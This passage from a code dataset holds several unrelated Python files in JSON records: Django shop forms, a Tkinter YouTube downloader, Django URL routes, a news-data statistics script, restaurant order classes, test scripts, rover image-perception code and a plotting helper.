help_text=kb_username_description)\n email = forms.EmailField(label=_(u'E-mail'), required=False)\n \n class Meta:\n model = User\n fields = ('username', 'email',)\n\n def __init__(self, *args, **kwargs):\n super(KBRegisterForm, self).__init__(*args, **kwargs)\n \n def clean_username(self):\n username = self.cleaned_data.get('username')\n if not re_kb_username.search(username):\n raise forms.ValidationError(kb_username_description)\n\n if username:\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n pass\n else:\n raise forms.ValidationError(_(u'Пользователь с таким именем уже существует'))\n return username\n\n def save(self, commit=True):\n user = super(KBRegisterForm, self).save(commit=False)\n password = generate_password()\n user.set_password(password)\n user.save()\n KBProfile.objects.create(user=user)\n IQSMS().send('7'+user.username, u'Интернет-магазин King-Bong.ru. Ваш пароль %s' % password)\n return user\n \nclass KBPassResetForm(forms.Form):\n username = forms.CharField(label=u'Телефон', max_length=30, required=True, help_text=kb_username_description)\n\n def clean_username(self):\n username = self.cleaned_data.get('username')\n if not re_kb_username.search(username) and not User.objects.filter(username=username):\n raise forms.ValidationError(kb_username_description)\n if username:\n try:\n self.user = User.objects.get(username=username)\n except User.DoesNotExist:\n raise forms.ValidationError(u'Такой пользователь не зарегистрирован.')\n \n return self.cleaned_data.get('username')\n \n def save(self):\n password = generate_password()\n self.user.set_password(password)\n self.user.save()\n IQSMS().send('7'+self.user.username, u'Интернет-магазин King-Bong.ru. 
Ваш пароль %s' % password)\n\nclass SearchForm(forms.Form):\n query = forms.CharField(label=u'Ключевое слово', required=False)\n \n def clean_query(self):\n q = self.cleaned_data.get('query')\n if not q:\n raise forms.ValidationError(u'Чтобы получить результат введите что-нибудь в поле поиска')\n if len(q) < 2:\n raise forms.ValidationError(u'Пожалуйста, введите 2 или более символов')\n return q\n\n def filter(self, items):\n from django.db.models import Q\n\n query = self.cleaned_data.get('query', '')\n qobj = reduce(lambda x,y: x | y, (Q(**{'%s__icontains' % a:query}) for a in ('title', 'article', 'category__title')))\n return items.filter(qobj).distinct()\n","sub_path":"shop/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":14780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"276266918","text":"from pytube import YouTube\nfrom tkinter import *\nfrom tkinter.filedialog import *\nfrom tkinter.messagebox import *\nfrom PIL import ImageTk, Image\nfrom urllib.request import urlopen\nfrom io import BytesIO\nfrom threading import *\nimport os\n\n\ndef onClickSearch():\n global video\n video = YouTube(url.get())\n\n raw_data = urlopen(video.thumbnail_url).read()\n im = Image.open(BytesIO(raw_data))\n im = im.resize((round(im.size[0]*0.15), round(im.size[1]*0.15)))\n\n thumb_img = ImageTk.PhotoImage(im)\n thumb = Label(image=thumb_img)\n thumb.image = thumb_img\n thumb.pack(anchor=W, padx=30, pady=5)\n\n video_label = Label(root, text=video.title)\n video_label.pack(anchor=W, padx=30, pady=5)\n\ndef btnClicked():\n try:\n downloadBtn['text'] = \"Please Wait...\"\n downloadBtn[\"state\"] = 'disabled'\n print(video)\n thread = Thread(target=startDownload, args=(url,)) # bloody comma is important\n thread.start()\n except Exception as e:\n print(e)\n\n# Download Function\ndef startDownload(url):\n global file_size\n path_to_save = askdirectory()\n if path_to_save is None:\n return\n downloadBtn[\"status\"] = \"active\"\n if os.path.isfile(video.description): print(\"Video already exists\")\n\n try:\n st = video.streams.first()\n\n video.register_on_complete_callback(completeDownload)\n video.register_on_progress_callback(progressDownload)\n\n file_size = st.filesize\n st.download(output_path=path_to_save)\n except Exception as e:\n print(e)\n downloadBtn['text'] = \"Something went wrong\"\n\ndef progressDownload(stream=None, chunk=None, bytes_remaining=None):\n percent = (100 * ((file_size-bytes_remaining)/file_size))\n downloadBtn['text'] = \"{:00.0f}% downloaded \".format(percent)\n\ndef completeDownload(stream=None, file_path=None):\n print(\"Download completed\")\n showinfo(\"Message\", \"File has been downloaded\")\n downloadBtn['text'] = \"Download Video\"\n downloadBtn['state'] = \"active\"\n url.delete(0,END)\n\n# GUI Coding\nroot = Tk()\nroot.title(\"Youtube Downloader\")\nroot.iconbitmap(\"youtube-downloader-gui\\iconfinder_play_alt_118620.ico\")\nroot.geometry(\"700x500\")\n\nfile = PhotoImage(file=\"youtube-downloader-gui/youtube-icon-vid.png\")\nheadingIcon = Label(root, image=file)\nheadingIcon.pack(side=TOP, pady=3)\n\nurl_frame = LabelFrame(root, padx=10, pady=10)\nurl_frame.pack(padx=30, pady=20)\n\nurl_label = Label(url_frame, padx=10, anchor=W, text=\"URL:\")\nurl_label.grid(row=0, column=0, padx=10, pady=10)\n\nurl = Entry(url_frame, borderwidth=5, width=50)\nurl.grid(row=0, column=1, padx=10, pady=10)\n\nbutton = Button(url_frame, text=\"Search\", padx=10, command=onClickSearch)\nbutton.grid(row=0, 
column=3, padx=10, pady=10)\n\ndownloadBtn = Button(root, text=\"Download Video\", relief=\"ridge\", command=btnClicked)\ndownloadBtn.pack(side=BOTTOM, pady=20)\n\nroot.mainloop()\n\n# nice icon - Icons made by
    Flat Icons from www.flaticon.com\n# Test video: https://www.youtube.com/watch?v=9XaS93WMRQQ","sub_path":"ytdl.py","file_name":"ytdl.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637590538","text":"from django.urls import path\n# from api.views import show_taskLists, show_current_taskList, show_current_tasks\nfrom api.views import TaskLists, TaskListDetail, TaskListTasks, UserList\nfrom api.views import UserList, login, logout\n# urlpatterns = [\n# path('task_lists/', show_taskLists),\n# path('task_lists//', show_current_taskList),\n# path('task_lists//tasks/', show_current_tasks)\n# ]\nurlpatterns = [\n path('task_lists/', TaskLists.as_view()),\n path('task_lists//', TaskListDetail.as_view()),\n path('users/', UserList.as_view()),\n path('login/', login),\n path('logout/', logout),\n path('task_lists//tasks/', TaskListTasks.as_view())\n]","sub_path":"w13/week 13/todo-back/todo_back/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"479749971","text":"# !/usr/bin/env python3\n\"\"\"\nanalyze_data.py\n\nThis script gathers information about the data distribution in the form of counts for newspapers, political orientation and countries, both per cop and in total.\n\"\"\"\n\nfrom main import *\nfrom constants import *\n\n\ndef basics(cop):\n stats = dict()\n stats['date_from'] = cop['collection_start']\n stats['date_to'] = cop['collection_end']\n return stats\n\n\ndef counts(articles):\n counts = dict()\n counts['total_articles'] = len(articles)\n counts['newspapers'] = dict([(np,0) for np in get_newspaper_list()])\n counts['labels'] = {'Right-Center':0, 'Left-Center':0}\n counts['country'] = {'Australian':0, 'India':0, 'South Africa':0, 'United States':0}\n\n for article in articles:\n counts['newspapers'][article['newspaper']] += 1\n counts['labels'][get_newspaper_orientation(article['newspaper'])] += 1\n counts['country'][get_newspaper_country(article['newspaper'])] += 1\n\n return counts\n\n\ndef get_stats_per_cop(cop_selection=None):\n cop_data = read_data(cop_selection)\n statistics = dict()\n for cop in cop_data:\n statistics[cop] = dict()\n statistics[cop]['basics'] = dict()\n statistics[cop]['basics'] = basics(cop_data[cop])\n statistics[cop]['counts'] = dict()\n statistics[cop]['counts'] = counts(cop_data[cop]['articles'])\n\n return statistics\n\n\ndef get_stats(cop_selection=None):\n cop_data = read_data(cop_selection)\n articles = list()\n\n if not cop_selection:\n cop_selection = cop_data.keys()\n for cop in cop_selection:\n articles = articles + cop_data[cop]['articles']\n\n stats = dict()\n stats['counts'] = counts(articles)\n return stats\n\n\nif __name__ == '__main__':\n print(get_stats_per_cop(list(range(5,6))))\n uniques = get_unique_classifications()\n print(len(uniques['subject']))\n print(len(uniques['organization']))\n print(len(uniques['subject']))\n print(len(uniques['subject']))\n","sub_path":"analyze_data.py","file_name":"analyze_data.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600980590","text":"import datetime\n\nclass user():\n def __init__(self,first_name,last_name,pin,admin):\n self.first_name = first_name\n self.last_name = last_name\n self.administrator = admin\n self.pin = pin\n \n \n# menuItem: each object is a menu 
item\nclass menuItem():\n def __init__(self, name, cost, index = 0):\n self.name = name\n self.cost = cost\n self.index = index\n def __str__(self):\n return '{0:=<20s} {1:>5.2f}'.format(self.name,self.cost)\n\n# tableOrder is a class that stores the order's owner, menuItems ordered, and several\n# other important attributes for use by program \nclass tableOrder():\n def __init__(self, m_user):\n self.menuItems = []\n self.timeOpened = str(datetime.datetime.now())\n self.timeClosed = False\n self.m_split = 1\n self.m_table = 0\n self.m_guests = 1\n self.m_user = m_user\n self.m_subTotal = 0\n self.orderNumber = 0\n def close(self):\n if not self.timeClosed:\n self.timeClosed = str(datetime.datetime.now())\n def subTotal(self):\n return sum(m.cost for m in self.menuItems)\n \n def add_menuItem(self, menuItem):\n self.menuItems.append(menuItem)\n self.m_subTotal = self.subTotal()\n \n \nif __name__ == \"__main__\":\n u = user(\"jesse\",\"harper\",1234)\n o = tableOrder(user)\n o.close()\n print(o.timeOpened)\n print(o.timeClosed)","sub_path":"mainProgram/dataFields.py","file_name":"dataFields.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"481620903","text":"import selftest as T\nfrom TestMore import *\n\n\nT.plan(9)\nT.reset()\n\ndef throw(e):\n raise e\n\n\nT.ok(raises_like(lambda: throw(NotCallable(123)),\n lambda e: str(e) == \"Can't call 123\",\n \"raising with correct error message\"),\n \"raises_like succeeds if callback returns truthy\")\n\nT.ok(not raises_like(lambda: throw(NotNullary(456)),\n lambda e: str(e) != \"Callback is not allowed \"\n \"to take arguments: 456\"),\n \"raises_like fails if callback returns falsy\")\n\n\nexpected = \"You want to check if something raises SystemExit, but only \" \\\n \"subtypes of Exception are caught in the first place. 
Maybe you \" \\\n \"need to pass a catch argument, such as catch=BaseException?\"\ndef callback_that_raises(e):\n if str(e) == expected:\n raise ValueError\n\nraised = T.getraised(lambda: raises_like(\n lambda: throw(NotCaught(SystemExit, Exception)),\n callback_that_raises))\nT.ok(type(raised) is ValueError, \"raising in callback propagates\")\n\n\nraised = T.getraised(lambda: raises_like(\"not callable\", throw))\nT.ok(type(raised) is NotCallable, \"uncallable code raises NotCallable\")\n\nraised = T.getraised(lambda: raises_like(lambda x: \"not nullary\", throw))\nT.ok(type(raised) is NotNullary, \"code with required arg raises NotNullary\")\n\nraised = T.getraised(lambda: raises_like(lambda: 1, \"also not callable\"))\nT.ok(type(raised) is NotCallable, \"uncallable callback raises NotCallable\")\n\nraised = T.getraised(lambda: raises_like(lambda: 1, lambda: \"wrong args\"))\nT.ok(type(raised) is TypeError, \"wrong arguments in callback raises TypeError\")\n\n\ndone_testing()\n\n\nT.output_ok(\"ok 1 - raising with correct error message\\n\"\n \"not ok 2\\n\"\n \"1..2\\n\",\n \"correct output from raises_like\")\n\nT.error_ok(\"# Failed test at 20_raises_like.t.py in line 18\\n\",\n \"correct error output from raises_like\")\n","sub_path":"t/20_raises_like.t.py","file_name":"20_raises_like.t.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"573188138","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport os\nimport unittest\n\nfrom nose_parameterized import parameterized\n\nfrom tracking_utils import HarFileHandler, AustraliaHARData\nfrom tracking_testdata import *\n\n\nPRINT_ALL_MATCHING_REQUESTS = True\nPATH = os.getcwd()\nHOST = \"www.deliveryhero.com.au\"\n\n\nclass TrackingPixelsTest(unittest.TestCase):\n\n @classmethod\n def setupClass(self):\n self.harfilehandler = HarFileHandler(PATH)\n self.harfilehandler.delete_all_har_files_in_path()\n australia = AustraliaHARData(HOST, PATH)\n self.ordnum_logged_out, self.ordid_logged_out = (\n australia.happy_path())\n self.harfilehandler.cleanup_logged_out()\n self.ordnum_logged_in, self.ordid_logged_in = (\n australia.happy_path(should_log_in=True))\n self.harfilehandler.cleanup_logged_in()\n\n def print_culprit(self, key, value, search_string):\n msg = (\"Key/value pair ('%s': '%s') not found on page \"\n \"'%s' when testing the tracking pixel provider '%s'\" %\n (key, value, self.testname, search_string))\n logging.error(msg)\n self.error_msgs.append(msg)\n\n @parameterized.expand([\n (1, 'homepage_logged_out'),\n (1, 'homepage_logged_in'),\n (2, 'RLpage_logged_out'),\n (2, 'RLpage_logged_in'),\n (3, 'menupage_logged_out'),\n (3, 'menupage_logged_in'),\n (4, 'checkoutpage_logged_out'),\n (4, 'checkoutpage_logged_in'),\n (5, 'OCPpage_logged_out'),\n (5, 'OCPpage_logged_in')\n ])\n def test_tracking_pixel_calls(self, index, testname):\n filename = '%s_%s.har' % (index, testname)\n test_data = globals()[testname]\n self.testname = testname\n file_full_path = os.path.join(PATH, filename)\n with open(file_full_path, 'r') as har_file:\n data = json.load(har_file)\n\n self.error_msgs = []\n for item in test_data:\n name = item['name']\n search_list = item['data']\n\n # verbose printing of all matching requests in the given har file\n if PRINT_ALL_MATCHING_REQUESTS:\n self.harfilehandler.print_matching_requests(\n name, data, testname)\n\n # this here is the actual test method\n status = self.testname.split('_')[-1]\n order_number = 
getattr(self, 'ordnum_logged_%s' % (status, ))\n order_id = getattr(self, 'ordid_logged_%s' % (status, ))\n result = self.harfilehandler.find_in_logfiles(\n name, search_list, data, HOST, order_number, order_id)\n\n # None is returned if for a search string, there are no\n # key-value-pairs to look for. In this case, we skip the it\n if not result:\n continue\n\n # all key-value-pairs should have been found, otherwise\n # log the offending pairs\n if not all(x == 'found' for x in result.values()):\n [self.print_culprit(key, value, name)\n for key, value in result.iteritems()\n if value != 'found']\n\n # and there should be no error messages\n assert not self.error_msgs, self.error_msgs\n\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()\n","sub_path":"au/tracking_pixels/test_tracking_pixels.py","file_name":"test_tracking_pixels.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"393334572","text":"import pandas as pd\n\ndef get_data():\n df = pd.read_csv('data/detect.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n Xdummies_df = pd.get_dummies(X_df)\n Ydummies_df = Y_df\n\n X = Xdummies_df.values\n Y = Ydummies_df.values\n return X, Y\n\ndef get_full_data():\n df = pd.read_csv('data/detect.csv')\n # df = df.sample(frac=1)\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n return X, Y, df\n\ndef get_who_is():\n df = pd.read_csv('data/whois.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n return X, Y, df\n\ndef get_predict():\n df = pd.read_csv('data/predict.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n return X, Y, df\n\n\ndef get_evaluate():\n df = pd.read_csv('data/whois.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n X_train = X[0:4263]\n y_train = Y[0:4263]\n X_test = X[4264:]\n y_test = Y[4264:]\n return X_train, y_train, X_test, y_test","sub_path":"server/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"408707228","text":"import numpy as np\nimport cv2\n\n# Identify pixels above the threshold\n# Threshold of RGB > 160 does a nice job of identifying ground pixels only\n# Define a function to perform a perspective transform\ndef perspect_transform(img, src, dst):\n \n M = cv2.getPerspectiveTransform(src, dst)\n warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image\n \n return warped\n\ndef color_thresh(img, rgb_thresh=(160, 160, 160)):\n # Create an array of zeros same xy size as img, but single channel\n path = np.zeros_like(img[:,:,0])\n obstacles = np.zeros_like(img[:,:,0])\n # Require that each pixel be above all three threshold values in RGB\n # above_thresh will now contain a boolean array with \"True\"\n # where threshold was met\n above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n & (img[:,:,1] > rgb_thresh[1]) \\\n & (img[:,:,2] > rgb_thresh[2])\n below_thresh = (img[:,:,0] < rgb_thresh[0]) \\\n & (img[:,:,1] < rgb_thresh[1]) \\\n & (img[:,:,2] < rgb_thresh[2])\n # Index the array of zeros with the boolean array and set to 1\n 
path[above_thresh] = 1\n obstacles[below_thresh] = 1\n path3d = np.dstack((path*0, path*255, path*0)).astype(np.float)\n obstacles3d = np.dstack((obstacles*0, obstacles*0, obstacles*255)).astype(np.float)\n # Return the binary image\n return path, obstacles, path3d, obstacles3d\n\n#Define a function to find the rocks\ndef find_rock(img, lower_thresh, upper_thresh):\n dst_size = 5 \n bottom_offset = 6\n source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])\n destination = np.float32([[img.shape[1]/2 - dst_size, img.shape[0] - bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - 2*dst_size - bottom_offset], \n [img.shape[1]/2 - dst_size, img.shape[0] - 2*dst_size - bottom_offset],\n ])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(hsv,lower_thresh,upper_thresh)\n res = cv2.bitwise_and(img,img, mask = mask)\n return mask, res\n\n\n# Define a function to convert from image coords to rover coords\ndef rover_coords(binary_img):\n # Identify nonzero pixels\n ypos, xpos = binary_img.nonzero()\n # Calculate pixel positions with reference to the rover position being at the \n # center bottom of the image. \n x_pixel = -(ypos - binary_img.shape[0]).astype(np.float)\n y_pixel = -(xpos - binary_img.shape[1]/2 ).astype(np.float)\n return x_pixel, y_pixel\n\n\n# Define a function to convert to radial coords in rover space\ndef to_polar_coords(x_pixel, y_pixel):\n # Convert (x_pixel, y_pixel) to (distance, angle) \n # in polar coordinates in rover space\n # Calculate distance to each pixel\n dist = np.sqrt(x_pixel**2 + y_pixel**2)\n # Calculate angle away from vertical for each pixel\n angles = np.arctan2(y_pixel, x_pixel)\n return dist, angles\n\n# Define a function to map rover space pixels to world space\ndef rotate_pix(xpix, ypix, yaw):\n # Convert yaw to radians\n yaw_rad = yaw * np.pi / 180\n xpix_rotated = (xpix * np.cos(yaw_rad)) - (ypix * np.sin(yaw_rad))\n \n ypix_rotated = (xpix * np.sin(yaw_rad)) + (ypix * np.cos(yaw_rad))\n # Return the result \n return xpix_rotated, ypix_rotated\n\ndef translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale): \n # Apply a scaling and a translation\n xpix_translated = (xpix_rot / scale) + xpos\n ypix_translated = (ypix_rot / scale) + ypos\n # Return the result \n return xpix_translated, ypix_translated\n\n\n# Define a function to apply rotation and translation (and clipping)\n# Once you define the two functions above this function should work\ndef pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):\n # Apply rotation\n xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)\n # Apply translation\n xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)\n # Perform rotation, translation and clipping all at once\n x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)\n y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)\n # Return the result\n return x_pix_world, y_pix_world\n\n# Apply the above functions in succession and update the Rover state accordingly\ndef perception_step(Rover):\n # Perform perception steps to update Rover()\n # TODO: \n # NOTE: camera image is coming to you in Rover.img\n # 1) Define source and destination points for perspective transform\n dst_size = 5 \n bottom_offset = 6\n img = Rover.img\n source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])\n destination = np.float32([[img.shape[1]/2 - dst_size, img.shape[0] - bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - 
bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - 2*dst_size - bottom_offset], \n [img.shape[1]/2 - dst_size, img.shape[0] - 2*dst_size - bottom_offset],\n ])\n # 2) Apply perspective transform\n warped = perspect_transform(img,source,destination)\n # 3) Apply color threshold to identify navigable terrain/obstacles/rock samples\n low_yellow = np.array([90,100,100])\n up_yellow = np.array([100,255,255])\n path, obstacles, path3d, obstacles3d = color_thresh(warped)\n rocks,res =find_rock(warped, low_yellow, up_yellow) # 4) Update Rover.vision_image (this will be displayed on left side of screen)\n Rover.vision_image[:,:,2]=(obstacles+rocks)*255\n Rover.vision_image[:,:,1]=(path+rocks)*255\n Rover.vision_image[:,:,0]=rocks\n\n # Example: Rover.vision_image[:,:,0] = obstacasle color-thresholded binary image\n # Rover.vision_image[:,:,1] = rock_sample color-thresholded binary image\n # Rover.vision_image[:,:,2] = navigable terrain color-thresholded binary image\n\n # 5) Convert map image pixel values to rover-centric coords\n x_pixel,y_pixel = rover_coords(path)\n x_obspix,y_obspix = rover_coords(obstacles)\n x_rockpix,y_rockpix = rover_coords(rocks)\n # 6) Convert rover-centric pixel values to world coordinates\n worldmap = np.zeros((200, 200))\n world_size = worldmap.shape[0]\n scale = 2*dst_size\n x_worldpix,y_worldpix = pix_to_world(x_pixel,y_pixel,Rover.pos[0],Rover.pos[1],Rover.yaw,world_size,scale)\n x_worldobspix,y_worldobspix = pix_to_world(x_obspix,y_obspix,Rover.pos[0],Rover.pos[1],Rover.yaw,world_size,scale)\n x_worldrock,y_worldrock = pix_to_world(x_rockpix,y_rockpix,Rover.pos[0],Rover.pos[1],Rover.yaw,world_size,scale)\n # 7) Update Rover worldmap (to be displayed on right side of screen)\n Rover.worldmap[y_worldobspix,x_worldobspix,0] = 255\n Rover.worldmap[y_worldpix,x_worldpix,2] += 10\n nav_pix = Rover.worldmap[:,:,2] > 0\n # Rover.worldmap[nav_pix,0] = 0\n Rover.worldmap[y_worldrock,x_worldrock,:] = 255\n # Example: Rover.worldmap[obstacle_y_world, obstacle_x_world, 0] += 1\n # Rover.worldmap[rock_y_world, rock_x_world, 1] += 1\n # Rover.worldmap[navigable_y_world, navigable_x_world, 2] += 1\n\n # 8) Convert rover-centric pixel positions to polar coordinates\n \n dist,angle = to_polar_coords(x_pixel,y_pixel)\n rockdist,rockangle = to_polar_coords(x_rockpix, y_rockpix)\n Rover.rock_dists = rockdist\n Rover.mean_rockdists = np.mean(rockdist)\n Rover.rock_angle = rockangle\n # Update Rover pixel distances and angles\n Rover.nav_dists = dist\n\n Rover.nav_angles = angle \n \n \n \n # Rover.nav_dists = rover_centric_pixel_distances\n # Rover.nav_angles = rover_centric_angles\n \n return Rover","sub_path":"code/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":7784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"615476648","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 7 14:22:11 2020\n\n@author: briardoty\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ntry:\n from .StatsProcessor import StatsProcessor\nexcept:\n from StatsProcessor import StatsProcessor\n\ntry:\n from .NetManager import nets\nexcept:\n from NetManager import nets\n\ntry:\n from .ActivationFunctions import *\nexcept:\n from ActivationFunctions import *\n\ntry:\n from .util import ensure_sub_dir\nexcept:\n from util import ensure_sub_dir\n\nimport matplotlib\nmatplotlib.rc('xtick', labelsize=14) \nmatplotlib.rc('ytick', 
labelsize=14) \n\ndef get_key(dct, val):\n\n for k, v in dct.items():\n if val == v:\n return k\n return None\n\ndef get_component_cases(case_dict, case):\n \"\"\"\n Returns the names of cases that compose the given mixed case\n\n Args:\n case_dict (dict)\n case: the mixed case \n \"\"\"\n\n # identify \"component\" cases...\n def param_to_float(p):\n return float(p) if p != \"None\" else p\n\n z = list(zip(case_dict[case][\"act_fns\"], [param_to_float(p) for p in case_dict[case][\"act_fn_params\"]]))\n component_cases = []\n\n for k, v in case_dict.items():\n\n if len(component_cases) >= len(z):\n return component_cases\n \n if (len(v[\"act_fns\"]) == 1 \n and (v[\"act_fns\"][0], param_to_float(v[\"act_fn_params\"][0])) in z):\n component_cases.append(k)\n\n return component_cases\n\nclass Visualizer():\n \n def __init__(self, data_dir, n_classes=10, save_fig=False, refresh=False):\n \n self.data_dir = data_dir\n self.save_fig = save_fig\n self.refresh = refresh\n \n self.stats_processor = StatsProcessor(data_dir, n_classes)\n \n def plot_activation_fns(self, act_fns):\n \"\"\"\n Plots the given activation functions on the same figure\n \"\"\"\n\n x = np.linspace(-5, 5, 50)\n x = torch.tensor(x)\n fig, ax = plt.subplots(figsize=(7,5))\n\n for fn in act_fns:\n y = fn(x)\n ax.plot(x, y, label=str(fn))\n\n ax.legend()\n\n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n \n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/act_fns/\")\n fn_names = \" & \".join([str(fn) for fn in act_fns])\n filename = f\"{fn_names}.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300)\n\n def plot_prediction(self, pred_type=\"linear\"):\n \"\"\"\n \"\"\"\n\n # pull data\n df, case_dict, index_cols = self.stats_processor.load_final_acc_df(self.refresh)\n df_groups = df.groupby(index_cols)\n\n # plot\n fig, ax = plt.subplots(figsize=(9,12))\n\n\n\n def scatter_final_acc(self, dataset, net_names, schemes, act_fns):\n \"\"\"\n Plot a scatter plot of predicted vs actual final accuracy for the \n given mixed cases.\n\n Args:\n net_names\n schemes\n act_fns\n \"\"\"\n\n # pull data\n df, case_dict, index_cols = self.stats_processor.load_final_acc_df(self.refresh)\n df_groups = df.groupby(index_cols)\n\n # plot\n fig, ax = plt.subplots(figsize=(14,14))\n fmts = [\".\", \"^\"]\n mfcs = [\"None\", None]\n clrs = sns.color_palette(\"husl\", len(mixed_cases))\n\n # plot mixed cases\n i = 0\n for g in df_groups.groups:\n\n gset, net, scheme, case = g\n\n g_data = df_groups.get_group((dataset, net, scheme, case))\n fmt = fmts[net_names.index(net)]\n mfc = mfcs[schemes.index(scheme)]\n clr = clrs[mixed_cases.index(case)]\n\n # actual\n y_act = g_data[\"final_val_acc\"][\"mean\"].values[0]\n y_err = g_data[\"final_val_acc\"][\"std\"].values[0] * 2\n\n # prediction - get component cases...\n x_pred = component_accs.mean()\n x_err = component_stds.mean()\n \n # plot\n ax.errorbar(x_pred, y_act, xerr = x_err, yerr=y_err, \n label=f\"{net} {scheme} {case}\", \n elinewidth=1, c=clr, fmt=fmt, markersize=10,\n markerfacecolor=mfc)\n\n i += 1\n\n # plot reference line\n x = np.linspace(0, 1, 50)\n ax.plot(x, x, c=(0.5, 0.5, 0.5, 0.25), dashes=[6,2])\n\n # set figure text\n ax.set_title(f\"Linear predicted vs actual mixed case final accuracy - {dataset}\", fontsize=18)\n ax.set_xlabel(\"Predicted\", fontsize=16)\n ax.set_ylabel(\"Actual\", fontsize=16)\n ax.set_xlim([0.1, 1])\n ax.set_ylim([0.1, 1])\n ax.set_aspect(\"equal\", 
\"box\")\n ax.legend()\n \n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/scatter/{dataset}\")\n net_names = \", \".join(net_names)\n schemes = \", \".join(schemes)\n act_fns = \", \".join(act_fns)\n filename = f\"{net_names}_{schemes}_{act_fns}_scatter.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300) \n\n def plot_final_accuracy(self, net_name, control_cases, mixed_cases):\n \"\"\"\n Plot accuracy at the end of training for given control cases\n and mixed case, including predicted mixed case accuracy based\n on linear combination of control cases\n \"\"\"\n\n # pull data\n acc_df, case_dict = self.stats_processor.load_final_acc_df(\n net_name, control_cases + mixed_cases)\n acc_df_groups = acc_df.groupby(\"case\")\n\n # plot...\n handles = []\n labels = []\n\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(14,8), sharey=True)\n fig.subplots_adjust(wspace=0)\n clrs = sns.color_palette(\"hls\", len(control_cases) + 2 * len(mixed_cases))\n \n for i in range(len(control_cases)):\n\n case = control_cases[i]\n group = acc_df_groups.get_group(case)\n p = float(case_dict[case][0])\n\n # error bars = 2 standard devs\n yvals = group[\"final_val_acc\"][\"mean\"].values\n yerr = group[\"final_val_acc\"][\"std\"].values * 2\n h = axes[0].errorbar(p, yvals[0], yerr=yerr, label=case,\n capsize=3, elinewidth=1, c=clrs[i], fmt=\".\")\n \n handles.append(h)\n labels.append(case)\n \n # plot mixed case\n for i in range(len(mixed_cases)):\n\n mixed_case = mixed_cases[i]\n\n # actual\n group = acc_df_groups.get_group(mixed_case)\n y_act = group[\"final_val_acc\"][\"mean\"].values[0]\n y_err = group[\"final_val_acc\"][\"std\"].values * 2\n l = f\"{mixed_case} actual\"\n h = axes[1].errorbar(i, y_act, yerr=y_err, label=l,\n capsize=3, elinewidth=1, c=clrs[len(control_cases) + i], fmt=\".\")\n \n labels.append(l)\n handles.append(h)\n\n # predicted\n ps = [p for p in case_dict[mixed_case]]\n component_cases = [k for k, v in case_dict.items() if len(v) == 1 and v[0] in ps]\n y_pred = acc_df[\"final_val_acc\"][\"mean\"][component_cases].mean()\n l = f\"{mixed_case} prediction\"\n h = axes[1].plot(i, y_pred, \"x\", label=l,\n c=clrs[len(control_cases) + i + 1])\n\n labels.append(l)\n handles.append(h)\n\n fig.suptitle(\"Final 